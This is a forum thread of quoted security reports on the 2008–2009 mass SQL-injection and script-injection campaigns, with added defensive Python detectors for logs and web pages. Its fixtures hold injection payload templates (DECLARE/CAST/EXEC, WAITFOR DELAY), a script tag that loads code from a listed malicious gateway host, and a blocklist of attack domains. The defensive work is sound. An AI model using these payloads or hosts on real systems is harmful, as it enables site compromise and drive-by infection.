SQL Injection Attacks Targeting Chinese-oriented Sites
- http://www.f-secure.com/weblog/archives/00001482.html
August 8, 2008 - "...in conjunction with the Beijing 2008 Olympics Games, and with ‘China’ being one of the more popular search engine keywords at the moment, it makes sense for malware writers to focus their attention on the Chinese web – and we’ve been seeing some interesting examples of SQL injection attacks specifically targeting websites designed for a Chinese audience, whether from the mainland or overseas. Like most SQL injection attacks, these attacks begin with a compromising script being injected into a legitimate site, compromising it and redirecting its users to a malicious website. This website then takes advantage of the vulnerabilities available on the user’s computer to download and execute malicious programs... a specially crafted Flash file exploiting Adobe Flash Player Integer overflow (CVE-2007-0071) is also served. When the webpage is loaded, it forcefully floods the user’s computer memory beyond its capacity, then takes advantage of the computer’s attempts to correct the problem to execute its own hidden code. If the user hasn’t updated their Flash Player* to newer versions than those targeted, their computer is vulnerable..."

* http://www.adobe.com/go/getflashplayer
Current Adobe Flash Player version


2008-08-08, 18:58

More SQL Injections ...active NOW
- http://isc.sans.org/diary.html?storyid=4844
Last Updated: 2008-08-08 16:40:52 UTC - "... Various types of sites seem to be hit at the moment. From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.
A user visiting the site will hit w.js which, if they are using English, will pull down new.htm. new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages, flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm. Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html ... These files contain some JavaScript... So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc). Detection for these is poor. The IE versions 9/36 at VT (Virustotal) detect the file as malicious and for FF 10/36 detect the file as being malicious.
The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute...
Attempts to create ActiveX objects and pulls the same rondll32.exe. It looks like rondll32.exe pulls down thunder.exe and wsv.exe
Attempts to get the browser to include the rondll32.exe file. Detection for rondll32.exe is good with most AV products catching this one.
was unavailable at the time I checked.

These attacks are happening right now. The people that reported them identified the attacks in their log files and IDS systems. It is good to see that people are checking their logs. Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site. This round looks like it has just started. We'll keep an eye on how this develops."


2008-08-23, 03:12

Sunkist site - mass JavaScript injection
- http://securitylabs.websense.com/content/Alerts/3167.aspx
08.22.2008 - "Websense... has discovered that a Sunkist site is infected with a mass JavaScript injection that delivers a malicious payload. The reporting page on the Sunkist NewsLINK site contains malicious JavaScript code that loads malicious payloads from -nine- different hosts. Sunkist is a popular drink in the USA, Canada, UK, Australia, and other parts of the world..."

(Screenshot of the infected site available at the URL above.)


2008-08-29, 14:17

- http://www.darkreading.com/document.asp?doc_id=162515&print=true
AUGUST 27, 2008 - "...Attackers have begun hiding the malicious code by encoding so they can keep using these old-school attacks... ScanSafe today reported* an 87 percent jump in malware blocked by its Web security service in July compared with June, 75 percent of which came from the wave of SQL injection attacks hitting Websites the past few months. ScanSafe detected 34 percent more malware last month than it did in all of 2007, according to the report..."
* http://www.scansafe.com/__data/assets/pdf_file/8696/July_2008_GTR_rev.pdf
"...ScanSafe reported a 278% increase for the first six months of the year. That alarming trend continued in July with the number of Web-based malware blocks increasing another 87% over the previous month. The majority of the increase in Web-based malware resulted from ongoing web-site compromises which represented 83% of all malware blocks for the month. 75% of all malware blocks were the result of SQL injection attacks, the majority of which were related to the Asprox fast flux botnet. The Asprox botnet is believed to have origins in Russia and has commercial interests ranging from spam and clickfraud to rogue anti-spyware software and backdoor Trojans. July 2008 also bore witness to an increase in social engineering email scams designed to install malware on victims' computers. 95% of ScanSafe customers fell for the scams and attempted to clickthrough to the malicious site, which represented 1.3% of all malware blocks for the month..."


2008-09-16, 15:07

SQL injection ...BusinessWeek.com
- http://www.sophos.com/pressoffice/news/articles/2008/09/businessweek.html
15 September 2008 - "Hundreds of webpages in a section of BusinessWeek’s website which offers information about where MBA students might find future employers have been affected. According to Sophos, hackers used an SQL injection attack - where a vulnerability is exploited in order to insert malicious code into the site's underlying database - to pepper pages with code that tries to download malware from a Russian web server..."

(Video available at the URL above.)


2008-09-18, 11:54

SQL threat: All Your (Data)base Are Belong to Trojan.Eskiuel...
- http://preview.tinyurl.com/45qhsy
09-17-2008 (Symantec Security Response Blog) - "...Our honeypot servers are full of plenty of worms that spread by email, IM, file-sharing, or network vulnerabilities, so finding a Trojan that targets SQL databases is always an unusual surprise for a virus researcher... new SQL threat: Trojan.Eskiuel*. The main functionality of this threat is to scan the Internet to find machines with poorly configured SQL servers (i.e. with weak or non-existing passwords), gain access to them, and use their stored procedures in order to download new malware from a remote host. The anatomy of the attack is pretty simple. When run, the threat will read the IP address passed as an input parameter in the command line, and will start scanning all of the class B subnet of that IP address, looking for an SQL server... Once an SQL server is located, the Trojan will run a bruteforce attack on some common weak passwords for the administrator "sa" account. Note that the threat does not try to exploit any vulnerability, it is only trying to take advantage of SQL servers that may not be properly configured. When a weak password is found, the Trojan will log into the SQL server with full administrator rights... Machines with a badly configured SQL server are exposed to this threat, which can attack the servers both locally and remotely. Standard good security practices are advised to tackle this risk: set a strong password for the SQL server administrator account, block access to the server from unrequired networks, and properly configure access rights for the stored procedures."
* http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-091215-0809-99

(Screenshots and more detail available at both URL links above.)
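Added example (not Symantec's code and not from the write-up above): a detector for the "sa" password-guessing behaviour described there, run over constructed lines written in the style of the SQL Server ERRORLOG login audit messages ("Login failed for user ..." / "Login succeeded for user ..." with a [CLIENT: ip] suffix). The failure threshold, the time window and the sample lines are assumptions. Besides the burst of failures itself, it flags the case a defender most wants to see: a successful login from the same client while its failures are still inside the window.

```python
"""Added example: spot password guessing against a SQL Server 'sa' login in
the ERRORLOG. Sample lines are constructed in the ERRORLOG style; the
threshold and window are assumptions, not values from the Symantec write-up.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: six failures for 'sa' from one client inside ten seconds,
# then a success from that client, plus two unrelated failures from elsewhere.
SAMPLE_ERRORLOG = "\n".join(
    [
        f"2008-09-17 10:15:0{i}.00 Logon       Login failed for user 'sa'. "
        "Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]"
        for i in range(1, 7)
    ]
    + [
        "2008-09-17 10:15:08.00 Logon       Login succeeded for user 'sa'. "
        "Connection made using SQL Server authentication. [CLIENT: 192.0.2.10]",
        "2008-09-17 10:20:00.00 Logon       Login failed for user 'appuser'. "
        "Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]",
        "2008-09-17 10:20:01.00 Logon       Login failed for user 'appuser'. "
        "Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]",
    ]
)

LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ Logon\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']+)'.*"
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_logon_events(text: str) -> list:
    """Extract (timestamp, outcome, user, client) from login audit lines, oldest first."""
    events = []
    for line in text.splitlines():
        m = LOGON_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["outcome"], m["user"], m["client"]))
    events.sort(key=lambda e: e[0])
    return events


def detect_password_guessing(text: str, threshold: int = 5, window_seconds: int = 60) -> list:
    """Return alerts as (kind, client, user, failures_in_window).

    'burst'               : `threshold` failures for one login from one client
                            within `window_seconds` (reported once per pair).
    'success_after_burst' : that client then logged in as that user while its
                            failures were still inside the window.
    """
    recent = defaultdict(deque)  # (client, user) -> timestamps of recent failures
    bursting = set()
    alerts = []
    for ts, outcome, user, client in parse_logon_events(text):
        key = (client, user)
        q = recent[key]
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()  # slide the window forward
        if outcome == "failed":
            q.append(ts)
            if len(q) >= threshold and key not in bursting:
                bursting.add(key)
                alerts.append(("burst", client, user, len(q)))
        elif key in bursting and q:
            alerts.append(("success_after_burst", client, user, len(q)))
    return alerts


if __name__ == "__main__":
    for alert in detect_password_guessing(SAMPLE_ERRORLOG):
        print(alert)
```

The "Login succeeded" line only appears when the server's login auditing is set to record successful as well as failed logins; with the default failed-only setting the second alert cannot fire, so enabling the fuller audit level is part of making this useful. The two unrelated failures stay below the threshold and produce nothing.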


2008-09-29, 14:13

ASPROX mutant
- http://isc.sans.org/diary.html?storyid=5092
Last Updated: 2008-09-29 10:22:25 UTC - "...ongoing SQL injections... The injection itself (starting with DECLARE...) looks a lot like the technique used by ASPROX (see our earlier diary*), but that the injection attempt here is made not via the URL but rather via a cookie is a new twist... in the end delivers a file called "x.exe" that looks like yet another password stealer, but has poor detection at this time (Virustotal**)..."
* http://isc.sans.org/diary.html?storyid=4565

** http://www.virustotal.com/en/analisis/5584aa5aed6d2338141d7ae62c126fff
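Added example, not from either ISC diary: a log inspector for the two probe behaviours described in this thread, the 20-second time-delay check from the 2008-07-24 diary and the DECLARE/CAST injection carried in a Cookie header instead of the URL from this ASPROX-mutant diary. It assumes an Apache access log written with the request line, the %D service time in microseconds and the Cookie request header (that LogFormat is an assumption, as are the sample lines, which are constructed; the hex literal in them decodes to a harmless marker string, not to a statement).

```python
"""Added example: inspect web-server access-log lines for the two probe
patterns described in the thread. Assumed Apache LogFormat (not from the
diaries):  %h %t "%r" %>s %D "%{Cookie}i"   (%D = service time in microseconds).
The sample lines are constructed; the hex literal decodes to a harmless marker.
"""
import re
from urllib.parse import unquote_plus

MARKER_HEX = b"constructed sample".hex().upper()  # stands in for a hidden statement

SAMPLE_LOG = "\n".join([
    # ordinary request, about 48 ms
    '198.51.100.7 [29/Sep/2008:10:22:25 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 48213 "session=abc"',
    # DECLARE/CAST payload appended to a numeric parameter in the URL
    '198.51.100.7 [29/Sep/2008:10:22:26 +0000] "GET /news.asp?id=12;DECLARE%20@s%20VARCHAR(4000);'
    f'SET%20@s=CAST(0x{MARKER_HEX}%20AS%20VARCHAR(4000));EXEC(@s);-- HTTP/1.1" 200 51002 "session=abc"',
    # time-delay check: the page normally answers in milliseconds, this one took 20 s
    '198.51.100.7 [29/Sep/2008:10:22:27 +0000] "GET /news.asp?id=12;WAITFOR%20DELAY%20\'0:0:20\'-- HTTP/1.1" 200 20017340 "session=abc"',
    # same payload, carried in the Cookie header while the URL looks clean
    '198.51.100.7 [29/Sep/2008:10:22:28 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 50212 '
    f'"id=12;DECLARE%20@s%20VARCHAR(4000);SET%20@s=CAST(0x{MARKER_HEX}%20AS%20VARCHAR(4000));EXEC(@s);--"',
])

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<micros>\d+) "(?P<cookie>[^"]*)"$'
)
SQL_RE = re.compile(
    r"\b(DECLARE|CAST\s*\(|EXEC\s*\(|UNION\s+(?:ALL\s+)?SELECT|WAITFOR\s+DELAY|SLEEP\s*\(|BENCHMARK\s*\()",
    re.I,
)
DELAY_RE = re.compile(r"\b(WAITFOR\s+DELAY|SLEEP\s*\(|BENCHMARK\s*\()", re.I)
HEX_RE = re.compile(r"0x([0-9A-Fa-f]{8,})")


def decode_vector(raw: str) -> str:
    """URL-decode one input vector and append the ASCII decoding of any long hex
    literal, because the ASPROX-style injection hides its statement in CAST(0x...)."""
    text = unquote_plus(raw)
    for hexstr in HEX_RE.findall(text):
        try:
            text += " " + bytes.fromhex(hexstr).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            pass  # odd length or non-text: leave the literal as it is
    return text


def inspect_line(line: str, slow_seconds: float = 10.0) -> list:
    """Return (client_ip, path, vector, kind) findings for one log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    path, _, query = m["target"].partition("?")
    seconds = int(m["micros"]) / 1_000_000
    findings = []
    for vector, raw in (("query", query), ("cookie", m["cookie"])):
        text = decode_vector(raw)
        if not SQL_RE.search(text):
            continue
        # a delay keyword plus a response far slower than normal is the
        # "did it wait 20 seconds?" check the 2008-07-24 diary describes
        if seconds >= slow_seconds and DELAY_RE.search(text):
            kind = "time-based probe"
        else:
            kind = "sql-injection attempt"
        findings.append((m["ip"], path, vector, kind))
    return findings


def scan_log(text: str, slow_seconds: float = 10.0) -> list:
    """Inspect every line of an access log and collect the findings."""
    out = []
    for line in text.splitlines():
        out.extend(inspect_line(line, slow_seconds))
    return out


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Two design points follow from the diaries: the Cookie header has to be logged and inspected, because the default combined format does not record it and the cookie-borne injection is invisible without it; and the time-delay check is only recognisable when service time is logged, since the request itself returns a normal 200.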


2008-10-14, 20:08

China Business Network Rail Site Infected with Mass Script Injection
- http://securitylabs.websense.com/content/Alerts/3207.aspx
10.14.2008 - "Websense... discovered today that the China Business Network Rail Web site has been infected with the mass attack JavaScript injection to deliver a malicious payload. The reporting page on the site contains partially obfuscated malicious JavaScript code that, through numerous redirects, loads numerous exploit code. Applications targeted include a GLWorld ActiveX Control, Real Player, a UUSE P2P streaming application, and Xulnei Thunder DapPlayer... Websense ThreatSeeker has been tracking how such attacks prevail over reputed Business-to-Business (B2B) and Business-to-Clients (B2C) Web sites to target their peers and other visitors..."

(Screenshots available at the URL above.)


2008-10-17, 17:36

Adobe site - SQL injected...
- http://www.sophos.com/security/blog/2008/10/1863.html
16 October 2008 - "At the end of last week SophosLabs discovered that Adobe’s website was linking to a site infected with Mal/Badsrc-C. The infection had been encountered by a business partner of ours... Digging deeper, we discovered that the infected site was actually now part of the Adobe empire following an acquisition in October 2006. Some of the infected webpages have subsequently been rebranded but the underlying databases serving the site are still riddled with infections... The threat from web-based malware is increasing by the day and the fact that it can happen to companies as large as Adobe should make all web admins sit up and take notice.
NOTE/update: Last night Adobe contacted us and indicated that the issue had been resolved. I can confirm that the issue has been resolved."
- http://www.theregister.co.uk/2008/10/16/hijacked_abobe_page/

(Screenshot available at both URLs above.)


2008-11-05, 01:27

ECPAT NZ INC Courtesy Site: Mass Injection
- http://securitylabs.websense.com/content/Alerts/3227.aspx
11.04.2008 - "Websense... has discovered that an ECPAT NZ INC courtesy site is infected with a mass JavaScript injection that delivers a malicious payload. Multiple pages on the site have been mass injected attempting to deliver malicious payloads from 20 different hosts. ECPAT is a global network of organizations and individuals working together for the elimination of child prostitution, child pornography, and the trafficking of children for sexual purposes. ECPAT NZ plays a key role in liaising and bringing about cooperation between key government and sector groups involved in the areas of commercial sexual exploitation of children (CSEC). In an effort to protect their visitors, Websense Security Labs is working closely with ECPAT NZ INC to advise on the threats on their Web site. The ThreatSeeker Network has been tracking how such attacks prevail over reputed and significant Web sites, targeting their peers and other visitors..."

(Screenshots available at the URL above.)


2008-11-08, 22:46

- http://www.viruslist.com/en/weblog?weblogid=208187604
November 07, 2008 | 16:31 GMT - "...onset of the latest mass hack attack – websites being hacked and links placed on them that lead to malicious servers. We’re estimating that in the last two days alone, between 2000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this... We’re still working on determining exactly how the sites were hacked, but there are two scenarios which are the most likely – using SQL injection or using accounts to the sites which had already been stolen. One common factor is that the majority of the hacked sites run on some type of ASP engine... The attackers add a tag, <script src=http://******/h.js>, to the html of hacked sites. The link leads to JavaScript located on one of six servers – these servers act as gateways for further redirecting of requests. We’ve identified six of these gateways and they’ve been added to the blacklist in our antivirus:
* armsart.com
* acglgoa.com
* idea21.org
* yrwap.cn
* s4d.in
* dbios.org
If you’re an admin, you should block access to these sites..."


2008-11-25, 17:57

"Warning: We strongly suggest that readers NOT visit websites on this list. They all have a history of covert hacks, redirecting the browser to drive-by-malware installations, and should be considered dangerous and capable of infecting and causing damage to your system with exploits, spyware, trojans, viruses, and the like."

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 11/24/08 13:44:37 -0400

Significant additions (442 domains in the list):
Domain ............................ Count ..... Date Found
go .nnd .hk ...................... 92,400 .... 11/04/08
www .wakasa .or .jp .............. 87,700 .... 11/12/08


2008-12-01, 19:45

- http://www.infoworld.com/article/08/12/01/CBS_website_bitten_by_iFrame_hack_1.html
December 01, 2008 - "TV network CBS has become the latest big name to have it website used to host malware, a security company has reported. It appears that Russian malware distributors were able to launch another iFrame attack on a sub-domain of the cbs.com site so that it was serving remote malware to any visitors. A user's vulnerability to the malware attack launched by the site hack would depend on a number of factors, including the type of security used on a PC, the operating system, and possibly the browser version... Finjan had informed CBS of the issue, but that the Russian exploit server had in any case been taken offline, neutering the attack for the time being..."


2008-12-24, 11:58

Mass Injection on John Sands Greeting Card Company site
- http://securitylabs.websense.com/content/Alerts/3268.aspx
12.23.2008 - "Websense... has discovered that the Web site of John Sands Greeting Card Company is infected with a mass JavaScript injection that delivers a malicious payload. Multiple pages on the site have been found to contain the said malicious code... Acquired by American Greetings in 1996, the company was founded in 1837 by John Sands, the son of an English engraver. The company is Australia's second oldest registered company. In an effort to protect their visitors, Websense Security Labs has contacted John Sands Greeting Card Company and advised them on this incident..."

(Screenshot available at the Websense URL above.)


2008-12-31, 20:45

Multiple Chinese sites compromised...
- http://securitylabs.websense.com/content/alerts.aspx
12.31.2008 - Chinese Government Affairs Information Site Compromised...
12.29.2008 - Download Site of China.com Compromised - Malicious Web Site / Malicious Code
12.26.2008 - Sohu Web Site in China Compromised - Malicious Web Site / Malicious Code...


2009-01-13, 17:18

Paris Hilton website infected with malware
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=212800229
January 12, 2009 - "Once again, hackers have targeted technology associated with Paris Hilton. This time it's her Web site, ParisHilton .com. Security researchers at ScanSafe report that anyone visiting Hilton's site risks infection with malware. "Hilton's popular website, ParisHilton .com, has been outfitted with malware prompting site visitors to 'update' their system in order to continue navigating the site," ScanSafe said in an e-mail. "When the bogus pop-up box appears, users have the option to click 'Cancel' or 'OK.' Regardless of which option they choose, destructive malware will be downloaded to the user's computer"... ScanSafe says the malware has been detected on some 15,000 other Web sites. The company says it found a similar threat, a malicious ad, on Major League Baseball's MLB.com last week. "Paris Hilton's site is currently compromised," said Mary Landesman, senior security researcher at ScanSafe, in a phone interview. "We first encountered it on [Jan. 9]. We don't know when it happened." According to Landesman, there's an iFrame that has been embedded in the ParisHilton .com Web site. The iFrame calls out to a site hosting the malware, you69tube .com. It downloads a malicious PDF and attempts to force users into clicking and launching the PDF, which attempts to activate an exploit. Because the malware tries to download additional files whether one clicks "Cancel" or "OK," Landesman says that only a hard quit - CTRL+ALT+Delete - of one's browser provides a way out..."

- http://www.f-secure.com/weblog/archives/00001581.html
January 15, 2009 - "... The offending IFrame appears to have been removed at this time... The infection of "Paris Hilton" highlights a popular trend among online attackers..."


2009-01-27, 12:25

"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system... list of domains used in the mass SQL injections that insert malicious javascript into websites..."

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 01/23/09 09:12:21 -0700


2009-01-30, 16:08
FYI... (It appears the hacks have been busy - CYA)

"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system... list of domains used in the mass SQL injections that insert malicious javascript into websites..."

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 01/29/09 14:02:09 -0700


2009-02-03, 19:06

- http://www-935.ibm.com/services/us/index.wss/summary/imc/a1030961?cntxt=a1030786
02 Feb 2009 - "... Web sites have become the Achilles' heel for corporate IT security. Attackers are intensely focused on attacking Web applications so they can infect end-user machines. Meanwhile, corporations are using off-the-shelf applications that are riddled with vulnerabilities; or even worse, custom applications that can host numerous unknown vulnerabilities that can't be patched. Last year more than half of all vulnerabilities disclosed were related to Web applications, and of these, more than 74 percent had no patch. Thus, the large-scale, automated SQL injection vulnerabilities that emerged in early 2008 have continued unabated. By the end of 2008, the volume of attacks jumped to 30 times the number of attacks initially seen this summer...
Although attackers continue to focus on the browser and ActiveX controls as a way to compromise end-user machines, they are turning their focus to incorporate new types of exploits that link to malicious movies (for example, Flash) and documents (for example, PDFs). In the fourth quarter of 2008 alone, IBM X-Force traced more than a 50 percent increase in the number of malicious URLs hosting exploits than were found in all of 2007. Even spammers are turning to known Web sites for expanded reach. The technique of hosting spam messages on popular blogs and news-related websites more than doubled in the second half of this year..."


2009-02-08, 19:08

Kaspersky USA site hacked...
- http://www.theregister.co.uk/2009/02/08/kaspersky_compromise_report/
8 February 2009 - "A security lapse at Kaspersky has exposed a wealth of proprietary information about the anti-virus provider's products and customers, according to a blogger*, who posted screen shots and other details that appeared to substantiate the claims. In a posting made Saturday, the hacker claimed a simple SQL injection gave access to a database containing "users, activation codes, lists of bugs, admins, shop, etc." Kaspersky has declined to comment... The Register will be updating this story as warranted..."
* http://hackersblog.org/2009/02/07/usakasperskycom-hacked-full-database-acces-sql-injection/


2009-02-27, 17:57

500,000 Websites Hit By New Form Of SQL Injection In '08
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=214600046
Feb. 25, 2009 - "...An automated form of SQL injection using botnets emerged as the popular method of hacking Websites, according to a newly released report from the Web Hacking Incidents Database (WHID), an annual report by Breach Security and overseen by the Web Application Security Consortium (WASC). The report also found that attackers increasingly are targeting a Website's customers rather than the sensitive information in the site's database... Mass SQL Injection Bot attacks basically automate the infection process; the Nihaorr1 and Asprox botnets both deployed this method last year, according to the report... Government, security, and law enforcement organizations represented the biggest sector suffering from these attacks (32 percent), but that may, in part, be due to their more stringent disclosure rules, the report says. Next were information services (13 percent), finance (11 percent), retail (11 percent), Internet (9 percent), and education (6 percent)..."
* http://www.breach.com/resources/whitepapers/2008WHID.html


2009-04-29, 19:11

DNS redirect attack - Puerto Rico
- http://news.cnet.com/8301-1009_3-10228436-83.html
April 27, 2009 - "... A group calling itself the "Peace Crew" claimed that they used a SQL injection attack to break into the Puerto Rico registrar's management system... While the sites that visitors were -redirected- to were obviously not the legitimate sites, DNS redirects could be used to send unsuspecting Web surfers to phishing sites pretending to be banks where they would be prompted to provide sensitive information. People should use the SSL (Secure Sockets Layer) protocol for encrypting communications with sensitive sites and use anti-phishing technology in the browser that colors part of the URL address bar green or red based on the safety level of the site being visited..."

(Screenshot available at the URL above.)


2009-04-30, 12:32

SQL injections through Search Engine reconnaissance...
- http://ddanchev.blogspot.com/2009/04/massive-sql-injections-through-search.html
April 29, 2009 - "From the lone Chinese SQL injectors empowered with point'n'click tools for massive SQL injection attacks, to the much more efficient and automated botnet approach courtesy of, for instance, the ASProx botnet. The process of automatically fetching URLs from public search engines in order to build hit lists for verifying against remote file inclusion attacks and potential SQL injections, remains a commodity feature in a great number of newly released malware bots... A recently released malware bot is once again empowering the average script kiddie with the possibility to take advantage of the window of opportunity for each and every remotely exploitable web application flaw... Moreover, the IRC based bot is also featuring a console which allows manual exploitation or intelligence gathering for a particular site. Some of the features include:
- Remote file inclusion
- Local file inclusion checks ()
- MySQL database details
- Extract all database names
- Data dumping from column and table
- Notification issued when Google bans the infected host for automatically using it
... The window of opportunity for abusing a particular web application flaw is abused much more efficiently due to the fact that reconnaissance data about its potential exploitability is already crawled by a public search engine - often in real time. The concept, as well as the features within the bot are not rocket science - that's what makes it so easy to use."


2009-05-30, 01:07

Mass Injection Compromises More than Twenty-Thousand Web Sites
- http://securitylabs.websense.com/content/Alerts/3405.aspx
05.29.2009 - "Websense... has detected that a large compromise of legitimate Web sites is currently taking place around the globe. Thousands of legitimate Web sites have been discovered to be injected with malicious Javascript, obfuscated code that leads to an active exploit site. The active exploit site uses a name similar to the legitimate Google Analytics domain (google-analytics.com), which provides statistical services to Web sites. This mass injection attack does -not- seem related to Gumblar. The location of the injection, as well as the decoded code itself, seem to indicate a new, unrelated, mass injection campaign... The exploit site is laden with various attacks. After successful exploitation, a malicious file is run on the exploited computer. The executed malware file has a very low AV detection rate*..."
* http://preview.tinyurl.com/lphk6r
File sysCF.tmp.exe received on 2009.05.29 17:04:04 (UTC) - Virustotal.com
Result: 4/39 (10.26%)


2009-05-30, 21:13

- http://www.theregister.co.uk/2009/05/30/mass_web_infection/
30 May 2009 - "... has spread to about 30,000 websites run by businesses, government agencies and other organizations, researchers warned Friday. The infection sneaks malicious javascript onto the front page of websites, most likely by exploiting a common application that leads to a SQL injection, said Stephan Chenette, manager for security research at security firm Websense. The injected code is designed to look like a Google Analytics script, and it uses obfuscated javascript, so it is hard to spot. The malicious payload silently redirects visitors of infected sites to servers that analyze the end-user PC. Based on the results, it attempts to exploit one or more of about 10 different unpatched vulnerabilities on the visitor's machine. If none exist, the webserver delivers a popup window that claims the PC is infected in an attempt to trick the person into installing rogue anti-virus software..."


2009-06-02, 06:33

- http://securitylabs.websense.com/content/Blogs/3408.aspx
06.01.2009 - "... Mass compromises... regularly take place, because attackers commonly use server-side vulnerabilities in an automated way to infiltrate legitimate Web sites and inject them with malicious code... The malicious code injected in the Beladen attacks* uses an obfuscation method that starts with the initialization of a long, obfuscated string parameter. This gets de-obfuscated and then executed by the browser. This kind of obfuscation can employ many levels of obfuscation - where obfuscated code leads to more obfuscated code, and so on... the malicious URL name redirects to a site with a name very similar to the Google Analytics service (this service exists at 'google-analytics.com'). Once redirection occurs, the user is redirected again to the exploits payload site, Beladen. Beladen uses wildcarded subdomains, so each time Beladen is used by the intermediate redirecting site, a different subdomain is used... Beladen is the exploit site where several exploits try to compromise the redirected browser. Beladen means loaded in German - a suitable name because the site is loaded with exploits. Once the browser is redirected to Beladen, there is another internal redirect check that verifies the referrer, to subvert any direct mining attempts to the site's obfuscated exploit code... the hosting malicious site was located at the IP subnet block of, which was part of the Russian Business Network (RBN). The threat this time comes from the IP block of, which is part of AS48031 NOVIKOV located in the Ukraine. According to our log data, this autonomous system has been quite busy spreading malicious code using Scareware, Rogue Antivirus software, and exploit sites (including the latest PDF exploits). The IP address hosting the specific attack we described holds yet another typosquat Google-like domain..."
* http://securitylabs.websense.com/content/Alerts/3405.aspx
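Added example (not Websense's code and not from any of the quoted write-ups): a scanner for the injected-content patterns this thread keeps reporting, run over a constructed HTML page. It looks for an external <script src=...> whose host is one of the six gateway hosts listed in the 2008-11-08 post (that list is the page's; the allowlist of expected script hosts is an assumption), for an inline script that decodes and writes a long string literal in the way this Beladen write-up describes, and for a zero-size iframe of the kind in the CBS and ParisHilton posts. The sample page, the 200-character literal threshold and the ".invalid" hostname are constructed.

```python
"""Added example: scan a page for the injected-content patterns described in
this thread. The gateway blocklist is the six hosts listed in the 2008-11-08
post; the sample page, allowlist and thresholds are constructed assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

GATEWAY_BLOCKLIST = {"armsart.com", "acglgoa.com", "idea21.org", "yrwap.cn", "s4d.in", "dbios.org"}
DECODE_CALL_RE = re.compile(r"\b(eval|unescape|document\.write|String\.fromCharCode)\s*\(")
LONG_LITERAL_RE = re.compile(r"'[^']{200,}'|\"[^\"]{200,}\"")

# Constructed sample page: a local script, an allowlisted CDN script, an injected
# gateway script tag (unquoted src, as in the post), an inline decode-and-write
# blob, and a zero-size iframe. ".invalid" is a reserved, never-resolving TLD.
BLOB = "41" * 150
SAMPLE_HTML = f"""<html><head>
<script src="/js/site.js"></script>
<script src="http://cdn.example.com/lib.js"></script>
<script src=http://armsart.com/h.js></script>
<script>var s='{BLOB}';document.write(unescape(s));</script>
</head><body>
<iframe src="http://exploit-host.invalid/x.htm" width="0" height="0"></iframe>
</body></html>"""


class _PageCollector(HTMLParser):
    """Collect script tags (src or inline body) and iframe attributes."""

    def __init__(self):
        super().__init__()
        self.scripts = []  # (src or None, inline text)
        self.iframes = []  # attribute dicts
        self._in_script = False
        self._buf = []
        self._script_src = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script, self._buf, self._script_src = True, [], a.get("src")
        elif tag == "iframe":
            self.iframes.append(a)

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._script_src, "".join(self._buf)))
            self._in_script = False


def _host(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def _hidden(attrs: dict) -> bool:
    """Zero-size or CSS-hidden frames are the usual shape of an injected iframe."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width") == "0" or attrs.get("height") == "0"
            or "display:none" in style or "visibility:hidden" in style)


def scan_html(html: str, allowed_hosts: set) -> list:
    """Return (kind, detail) findings. Relative URLs are treated as same-origin."""
    c = _PageCollector()
    c.feed(html)
    c.close()
    findings = []
    for src, body in c.scripts:
        if src is not None:
            host = _host(src)
            if not host:
                continue
            if host in GATEWAY_BLOCKLIST:
                findings.append(("blocklisted script host", host))
            elif host not in allowed_hosts:
                findings.append(("unexpected external script host", host))
        else:
            # long literal handed to a decode/write call: the Beladen pattern
            call = DECODE_CALL_RE.search(body)
            if call and LONG_LITERAL_RE.search(body):
                findings.append(("obfuscated inline script", call.group(1)))
    for a in c.iframes:
        host = _host(a.get("src", ""))
        if host and (_hidden(a) or host not in allowed_hosts):
            findings.append(("hidden or external iframe", host))
    return findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML, {"cdn.example.com"}):
        print(finding)
```

Run against the content actually served (or against the database rows the pages are rendered from, since several posts in this thread note the injection sits in the database), the allowlist is what turns this from a blocklist lookup into a change detector: a gateway domain not yet on anybody's list still shows up as an unexpected external host.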


2009-06-05, 01:36

- http://securitylabs.websense.com/content/Alerts/3412.aspx
